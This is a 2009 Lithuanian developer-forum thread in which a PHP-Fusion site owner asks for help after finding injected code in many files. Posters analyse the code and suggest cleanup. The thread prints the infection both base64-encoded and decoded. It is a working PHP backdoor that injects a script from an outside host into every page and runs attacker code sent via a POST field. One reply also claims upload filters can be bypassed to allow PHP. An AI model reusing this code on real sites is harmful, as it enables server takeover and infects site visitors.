WordPress, Shopify ir PHPFusion programuotojų bendruomenė

Parašė Langas· 2009 Gru. 3 16:12:12

Sveiki, užtikau kad šendien jau nebeveikia mano tinklalapis ir daugelyje failų randu šį kodą :

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZTc1ajAnKSl7ZnVuY3Rpb24gZTc1ajAoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMk5oYkdsaWNtRjBhVzl1TFhSbGMzUnBibWN0WlhGMWFYQnRaVzUwTG1OdkxuVnJMMDVsZDBsdFp5OXliMkp2ZEhNdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBlNzVqMDIoJGEsJGIsJGMsJGQpe2dsb2JhbCRlNzVqMDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGU3NWowMSkpY2FsbF91c2VyX2Z1bmMoJGU3NWowMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZTc1ajAnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdlNzVqMCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRlNzVqMGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2U3NWowMicpKSE9J2U3NWowMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

Gal galite padėti? kaip sutvarkyti tinklalapį ir apsaugoti nuo to, kas tai ?

Redagavo Langas· 2009 Gru. 3 17:12:49

Parašė d0mce· 2009 Gru. 3 16:12:44

Sveikas, čia yra shell'as virusas. Oj turėsi darbelio panaikinti sakant bus sunku. Apsaugosi tik su kodu kaip kiti sako antivirusinė. Be to naikink tuos virusus ir CHMOD index.php į 455.

Redagavo d0mce· 2009 Gru. 3 16:12:43

Parašė maxas66· 2009 Gru. 3 16:12:49

va kas

if(!function_exists('e75j0')){function e75j0($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2NhbGlicmF0aW9uLXRlc3RpbmctZXF1aXBtZW50LmNvLnVrL05ld0ltZy9yb2JvdHMucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function e75j02($a,$b,$c,$d){global$e75j01;$s=array();if(function_exists($e75j01))call_user_func($e75j01,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='e75j0')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('e75j0');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$e75j0l=(($a=@set_error_handler('e75j02'))!='e75j02')?$a:0;eval(base64_decode($_POST['e']));

ir dar viduje vienas kodas užkoduotas

<script src=http://calibration-testing-equipment.co.uk/NewImg/robots.php ></script>

Čia shellas įkištas kiek supratau, buvo kažkur forume jau tokia tema.

Redagavo maxas66· 2009 Gru. 3 16:12:44

Parašė Kelmas· 2009 Gru. 3 16:12:52

Atsinaujink jeigu naudoji PHP-FUSION 6 juk didelė saugumo klaidą ištaisyta!!!!!

Parašė d0mce· 2009 Gru. 3 16:12:04

Nevo teisingas, taip tai buvo tema. MediaL šitas atvejis buvo, nu ką pasakysiu MediaL nebeturėjo jegu su juo kovoti manau tau irgi neatsiras. Visu pirma, galėjo įmesti shell'ą į tavo svetaine taip: Davei kažkam administracijos laipsnį, ir jis įdėjo shell'a arba jo slaptažodį žinojo. Gali būti variantas ir tavo atkodavo md5 koduotę, ir sužinojo tavo slaptažodį įstate į svetaine shellą. Arba dar viena išeitis, leidi prisegti failus.

Parašė Kelmas· 2009 Gru. 3 16:12:24

d0mce parašė:
Nevo teisingas, taip tai buvo tema. MediaL šitas atvejis buvo, nu ką pasakysiu MediaL nebeturėjo jegu su juo kovoti manau tau irgi neatsiras. Visu pirma, galėjo įmesti shell'ą į tavo svetaine taip: Davei kažkam administracijos laipsnį, ir jis įdėjo shell'a arba jo slaptažodį žinojo. Gali būti variantas ir tavo atkodavo md5 koduotę, ir sužinojo tavo slaptažodį įstate į svetaine shellą. Arba dar viena išeitis, leidi prisegti failus.

Šitie variantai galimi jeigu turi priejima prie administravimo, kitu atvėju ne. (Na bet galimas daiktas, kad slaptažodžiai buvo: sūrys, šūdas ir pan).

Parašė d0mce· 2009 Gru. 3 16:12:59

Drageli, arba žino jo kas hasha, ir su juo sakau atkodavo md5 koduotę, įlindo į webą ir pradėjo žaisti. Langas visad kai dedi kam administracijos laipsnį neduok pridėtinių puslapių nuorodos uždrausk.;)

Parašė Kelmas· 2009 Gru. 3 16:12:02

d0mce parašė:
Drageli, arba žino jo kas hasha, ir su juo sakau atkodavo md5 koduotę, įlindo į webą ir pradėjo žaisti. Langas visad kai dedi kam administracijos laipsnį neduok pridėtinių puslapių nuorodos uždrausk.;)

Na tai sakau slaptažodis buvo labai easy, ir galėjo nebent atkodoti, nes jeigu aš duočiau viena iš savo hash'ų tu atkodinėtum dienas, naktis ir vistiek neatkodotum.

Parašė Langas· 2009 Gru. 3 16:12:36

Dragelis parašė:
Atsinaujink jeigu naudoji PHP-FUSION 6 juk didelė saugumo klaidą ištaisyta!!!!!

Atsinaujinau dar tą pačia dieną kai naujiena parašyta buvo, taip ir nesupratau tiksliai ką reikia daryti
Bėje nebesvaik, administratorių nebėra, visus pašalinęs esu jau ~ savaitę + yra administracijos apsauga navigation.php ar koks ten faile, automatiškai užbanina. niekas nežino nei duomenų bazės nei ftp.

Redagavo Langas· 2009 Gru. 3 16:12:44

Parašė d0mce· 2009 Gru. 3 16:12:54

#10

gal pas tave buvo galima prisegt failus prie kokio forumo?

Parašė Langas· 2009 Gru. 3 16:12:43

#11

Taip, tačiau ne php ir kitų panašio tipo

Parašė d0mce· 2009 Gru. 3 16:12:15

#12

tai šitą galima, apeiti, kad leistu php patalpinti. ;)

Parašė Langas· 2009 Gru. 3 16:12:03

#13

Gi nėra jokių patalpintu failų, jei nepastebėjai, temą sukūriau expert skiltyje, todėl prašyčiau tokiam botui kaip tu kuris rašo nesamones, tai yra atvėjus kurių negalėjo būti, tai nerašyk išvis.
Dabar dar vienas klausimėlis, jeigu pakeisiu includes folderį ar svetainė vėl veiks ? jeigu veiks tai kaip išvengti to ateityje, nes pirmą kartą susiduriu su tokiu atvėju

Redagavo Langas· 2009 Gru. 3 16:12:38

Parašė TDKileris· 2009 Gru. 3 17:12:23

#14

Man taspats atvejis buvo,pakovojau savaicike,jau buvo pradinge vienu metu,bet veliau vel pradejo tas pats,sql irgi buvo uzkrestas,tai tiesiog ftp kopija pasidariau i savo kompa jei prireiktu kokiu failiuku. Ir kurk weba is naujo,tik pirma istrink absoliuciai visus senus failus,pakeisk visus paswordus. Tik pirma savo kompe turek kokia antivirusine ,kad netuciau vel nebutu to paties

Parašė Langas· 2009 Gru. 3 17:12:36

#15

O dieve, kaip manai ant v7 eis uždėti v6 vartotojus, siuntinius forumo temas ir postus, komentarus ?

Parašė TDKileris· 2009 Gru. 3 22:12:52

#16

na net nzn,jau cia reiktu profu klausti nes as buvau v7 taj ir ka reikejo persikeliau i v7

Parašė darKy· 2009 Gru. 3 22:12:01

#17

per pma man rodos galima